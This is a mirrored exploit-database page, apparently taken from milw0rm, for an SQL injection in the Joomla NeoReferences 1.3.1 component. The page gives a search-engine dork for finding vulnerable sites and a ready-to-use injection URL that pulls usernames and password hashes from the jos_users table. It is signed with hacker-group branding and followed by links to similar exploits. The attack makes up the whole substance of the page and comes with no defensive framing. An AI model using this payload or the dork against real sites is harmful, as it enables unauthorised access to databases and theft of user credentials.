Joomla Component NeoReferences 1.3.1 (catid) SQL Injection Vuln

http://milw0rm.com/exploits/5034

########################################################################### joomla SQL Injection(com_neoreferences)############################################################################ AUTHOR : S@BUN## HOME : http://www.hackturkiye.com/########################################################################### DorKs 1 : allinurl: "com_neoreferences"#########################################################################EXPLOIT :index.php?option=com_neoreferences&Itemid=27&catid=99887766/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*%20where%20user_id=1=1/*########################################################################## S@BUN www.hackturkiye.com S@BUN########################################################################## S@BUN GOOD LUCKY S@BUN#########################################################################added notes: NeoReferences December 2006 NeoJoomla Released under CREATIVE COMMONS License Copyright (C) 2006 Neoweb support@neojoomla.com www.neojoomla.com 1.3.1 Developped by NeoJoomla.]]># milw0rm.com [2008-02-01]

» Joomla Component com_facileforms 1.4.4 RFI Vulnerability
» Site Sift scripts SQL Injection
» Demo4 CMS (index.php id) Remote SQL Injection Vulnerability
» HoMaP-CMS 0.1 (index.php go) Remote SQL Injection Vulnerability
» MVC-Web CMS 1.0/1.2 (index.asp newsid) SQL Injection Vulnerability

Permbajta e ksaj faqe kerkon flash player per instalim kliko mbi ket tekst.

Joomla Component NeoReferences 1.3.1 (catid) SQL Injection Vuln